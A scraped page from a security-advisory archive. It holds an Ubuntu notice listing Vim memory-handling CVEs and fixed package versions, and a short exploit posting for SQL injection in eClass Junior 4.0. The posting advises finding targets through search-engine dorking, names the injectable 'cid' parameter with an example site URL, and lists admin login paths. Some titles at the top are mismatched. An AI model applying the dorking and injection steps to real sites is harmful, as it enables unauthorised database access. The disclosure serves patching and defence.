Ubuntu Security Notice USN-6421-1

Ubuntu Security Notice 6420-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS. It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-6420-1October 09, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 22.04 LTS. (CVE-2022-3235, CVE-2022-3278,CVE-2022-3297, CVE-2022-3491)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-3352, CVE-2022-4292)It was discovered that Vim incorrectly handled memory when replacing invirtualedit mode. An attacker could possibly use this issue to cause adenial of service. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04LTS, and Ubuntu 22.04 LTS. (CVE-2022-3234)It was discovered that Vim incorrectly handled memory when autocmd changesmark. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2022-3256)It was discovered that Vim did not properly perform checks on array indexwith negative width window. An attacker could possibly use this issue tocause a denial of service, or execute arbitrary code. (CVE-2022-3324)It was discovered that Vim did not properly perform checks on a put commandcolumn with a visual block. An attacker could possibly use this issue tocause a denial of service. This issue only affected Ubuntu 20.04 LTS, andUbuntu 22.04 LTS. (CVE-2022-3520)It was discovered that Vim incorrectly handled memory when using autocommandto open a window. An attacker could possibly use this issue to cause adenial of service. (CVE-2022-3591)It was discovered that Vim incorrectly handled memory when updating bufferof the component autocmd handler. An attacker could possibly use this issueto cause a denial of service. This issue only affected Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-3705)It was discovered that Vim incorrectly handled floating point comparisonwith incorrect operator. An attacker could possibly use this issue to causea denial of service. This issue only affected Ubuntu 20.04 LTS. and Ubuntu22.04 LTS. (CVE-2022-4293)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.12  vim-athena                      2:8.2.3995-1ubuntu2.12  vim-gtk                         2:8.2.3995-1ubuntu2.12  vim-gtk3                        2:8.2.3995-1ubuntu2.12  vim-nox                         2:8.2.3995-1ubuntu2.12  vim-tiny                        2:8.2.3995-1ubuntu2.12  xxd                             2:8.2.3995-1ubuntu2.12Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.18  vim-athena                      2:8.1.2269-1ubuntu5.18  vim-gtk                         2:8.1.2269-1ubuntu5.18  vim-gtk3                        2:8.1.2269-1ubuntu5.18  vim-nox                         2:8.1.2269-1ubuntu5.18  vim-tiny                        2:8.1.2269-1ubuntu5.18  xxd                             2:8.1.2269-1ubuntu5.18Ubuntu 18.04 LTS (Available with Ubuntu Pro):  vim                             2:8.0.1453-1ubuntu1.13+esm5  vim-athena                      2:8.0.1453-1ubuntu1.13+esm5  vim-gtk                         2:8.0.1453-1ubuntu1.13+esm5  vim-gtk3                        2:8.0.1453-1ubuntu1.13+esm5  vim-nox                         2:8.0.1453-1ubuntu1.13+esm5  vim-tiny                        2:8.0.1453-1ubuntu1.13+esm5  xxd                             2:8.0.1453-1ubuntu1.13+esm5Ubuntu 14.04 LTS (Available with Ubuntu Pro):  vim                             2:7.4.052-1ubuntu3.1+esm13  vim-athena                      2:7.4.052-1ubuntu3.1+esm13  vim-gnome                       2:7.4.052-1ubuntu3.1+esm13  vim-gtk                         2:7.4.052-1ubuntu3.1+esm13  vim-nox                         2:7.4.052-1ubuntu3.1+esm13  vim-tiny                        2:7.4.052-1ubuntu3.1+esm13In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6420-1  CVE-2022-3234, CVE-2022-3235, CVE-2022-3256, CVE-2022-3278,  CVE-2022-3297, CVE-2022-3324, CVE-2022-3352, CVE-2022-3491,  CVE-2022-3520, CVE-2022-3591, CVE-2022-3705, CVE-2022-4292,  CVE-2022-4293Package Information:  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.12  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.18

Ubuntu Security Notice USN-6420-1

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

Tag

#ubuntu